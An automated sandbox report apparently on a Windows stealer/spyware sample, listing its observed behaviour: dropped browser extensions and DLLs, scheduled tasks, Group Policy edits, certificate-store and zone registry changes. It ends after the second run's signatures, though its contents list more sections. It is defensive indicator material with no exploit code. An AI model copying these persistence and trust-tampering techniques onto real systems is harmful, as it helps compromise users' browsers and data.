Malware Analysis Report

2025-08-11 06:22

Sample ID 240403-m4l76acg86
Target cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6
SHA256 cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6
Tags
discovery spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6

Threat Level: Likely malicious

The file cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6 was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Executes dropped EXE

Reads user/profile data of web browsers

Checks BIOS information in registry

Checks computer location settings

Loads dropped DLL

Checks installed software on the system

Drops desktop.ini file(s)

Drops Chrome extension

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-03 11:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-03 11:01

Reported

2024-04-03 11:03

Platform

win11-20240221-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\QBOHpSH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\QBOHpSH.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\yvWovCiVU\SgRnOD.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\FRisDUp.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\CCvwivM.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\NEwLKFN.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\vAdcuCY.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\VSQguRnnwOoDi.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\SAGeCMA.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\gyNrApt.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\cWRTdPp.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8465b6cf-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8465b6cf-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
